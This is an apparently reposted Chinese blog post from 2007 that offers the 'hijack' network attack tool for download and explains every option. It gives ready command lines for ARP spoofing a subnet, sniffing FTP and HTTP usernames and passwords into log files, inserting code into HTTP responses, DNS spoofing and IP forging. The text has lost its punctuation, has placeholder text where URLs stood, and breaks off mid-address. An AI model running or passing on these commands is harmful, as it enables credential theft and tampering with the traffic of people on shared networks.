渗透工具hijack使用及下载

渗透工具渗透工具 hijackhijack 使用及下载使用及下载 2007 12 14 10 29 57 标签 工具 使用 hijack 来源 精灵 s blog 找了两天终于找到这个工具了 郁闷的很 想要的都来下吧 需要 winpcap 支持 07 年的工具 到现在市面上都没有 可见此工具内部人员把握的够狠 前 几个月 AK 偶然得到 看了看也没太用过 今天听 sink 说网络上连个说明都没有 所以我就发 出来份吧 Amxking 今天听某小组成员说此工具是他们开发的 证实了是 07 年工具 而非 06 年 特此修正 usage hijack h is help usage 显示帮助信息 V is version information 显示版本信息 v is be verbose 程序运行时显示详细信息 q is be quiet don t print packet reception hash marks 安静模式 不显示数据包 标识 e is show empty packets 显示空的数据包 o is fixed 0 after replace data offset 替换数据后 被替换的数据后都用空字节 0 填充 i is ignore case 忽略大小写进行匹配 S is spoof interval default is 3000 ms 设置发送 RARP 欺骗的时间间隔 不能设太大 不然程序会死 条件竞争问题 针对攻击一些反 ARP 欺骗的主机 越小越好 l is set logfile to record 设置日专记录文件 日志记录文件将程序运行输出的内容 再记录的文件里 r is enabled ip routing 开启系统内置的路由功能 只能嗅探 不能修改数据包 b is to force define submask 强制指定子网掩码 对一些跨网段的欺骗有效 m is define max transmit speed k s 限制最大网络传输速度 k s f is set full spoof route mode default is half 设置欺骗方式为双向欺骗 x is print in alternate hexdump format 打印出来的数据为十六进制 X is interpret match e xpression as hexadecimal 设置要匹配的字串为十六进制 如 0 x0d0a00 p is the port to hijack 设置要进行数据劫持的端口 默认为全部 c is the flag string to insert for http hijack 要插入代码的 HTTP 响应包的特征字 符串 默认为 200 OK I is read packet stream from pcap format file pcap dump 从一个 pcap 数据包格式 的文件里读取数据包 进行离线嗅探 D is dnsspoof mode 模式改变为 DNS 欺骗 规则文件格式不变 t is print timestamp every time a packet is matched 当有匹配的数据包时 打出时 间戳 E is time to quit 程序自动退出的时间间隔 按秒计算 R is time to reboot program 程序自动重新启动的时间间隔 按秒计算 N is release demo job file 释放一规则文件 s is scan hosts in subnet 扫描子网 H is hidden from console background mode killed k 从控制台隐藏到后到执行 可 以用 hijack k 结束 k is killed a exists instance 结束一个存在的实例 O is dump matched packets in pcap format to pcap dump 保存匹配的数据包到一个 pcap 数据包格式的文件里 W is set the dump format normal byline none 设置数据包显示的格式 一般 按 行 无格式三种 F is read the filter from the specified file 从指定的文件里读取规则 z is IP faked mode genuine and faked host variable auto switch full spoof 进 行 IP 伪造 genuine host 和 faked host 生效 自动打开全双工选项 d is use specified device index 使用指定网卡的索引号 L is show the winpcap device list index 显示网卡列表 常用功能举例说明 显示网卡列表 hijack L 扫描子网 hijack sd3 结束一个现有的实例 hijack k 嗅探功能举例说明 嗅探子网 程序自动转发 可以匹配 但不能设置过滤规则 hijack d3 192 168 16 192 168 16 1 嗅探子网 同上 双向欺骗 hijack fd3 192 168 16 192 168 16 1 嗅探子网 同上 退出 Console 进入后台运行 hijack Hfd3 192 168 16 192 168 16 1 嗅探子网 同上 退出 Console 进入后台运行 120 秒后程序自动退出 hijack Hfd3 E 120 192 168 16 192 168 16 1 嗅探子网 同上 退出 Console 进入后台运行 120 秒后程序自动重新运行 hijack Hfd3 R 120 192 168 16 192 168 16 1 嗅探子网 程序自动转发 发送 RARP 欺骗包间隔为 100 微秒 hijack d3 S 100 192 168 16 192 168 16 1 嗅探子网 同上 强制指定子网掩码为 255 255 255 0 hijack d3 S 100 b 255 255 255 0 192 168 16 192 168 16 1 嗅探子网 系统自动转发 效率高 可以设置 BPF 规则 以下为嗅探 FTP 密码 为条件 分隔符 hijack rqd3 192 168 16 192 168 16 1 USER PASS tcp and dst port 21 同上 将信息保存到 pass log 里 pass log 里有详细的 FTP 密码信息 hijack rqd3 l pass log 192 168 16 192 168 16 1 USER PASS tcp and dst port 21 嗅探子网 一些常见的 HTTP 密码 不区分大小定 i 选项打开 保存数据包到 pass dat 里 hijack rqid3 O pass dat 192 168 16 192 168 16 1 username password tcp and dst port 80 还原数据包数据 程序将显示嗅探到的数据包 hijack I packet dat 自定义要嗅探的主机用 分隔 如 hijack rd3 192 168 16 3 192 168 16 8 192 168 16 10 20 192 168 16 1 数据包修改功能举例说明 释放一个替则文件 hijack N 释放的文件如下 gzip gxip http insert hijack 程序以 为分隔符 第一个字符串为原字符串 第二个字符串为替换后的字符串 最 大长度都为 256 字节 往下再重复 如果是原字符串为 http insert 表始要进行 HTTP 会话劫持 程序将下一条字符串插入到 HTTP 响应包里 劫持网关到子网之间的数据 并显示详细信息 hijack vd3 p 80 S 100 F job txt 192 168 16 1 192 168 16 修改后的数据用 0 字符填充 hijack vod3 p 80 S 100 F job txt 192 168 16 1 192 168 16 修改后的数据用 0 字符填充 hijack vod3 p 80 S 100 F job txt c 404 192 168 16 1 192 168 16 DNS 欺骗说明 需打开 D 选项 DNS 欺骗与数据包修改唯一不同的就是规则文件 一个实例的 DNS 欺骗需要用的规则文件 如下 url http 51CTO 提醒您 请勿滥发广告 url 192 168 16 3 192 168 16 1 欺骗后 就把 url http 51CTO 提醒您 请勿滥发广告 url 的 IP 解析成了 192 168 16 3 其它所有的都解析为 192 168 16 1 DNS 欺骗 url http 51CTO 提醒您 请勿滥发广告 url 为 192 168 16 3 规则文件 dns txt 如下 51CTO 提醒您 请勿滥发广告 192 168 16 3 命令如下 hijack Dvd3 F dns txt 192 168 16 192 168 16 1 注意 实例中 dns 查询包是从内网到外网发送的 所以欺骗方向要注意 IP 欺骗说明 需打开 z 选项 hijack zd3 202 108 22 33 202 108 22 1 61 163 8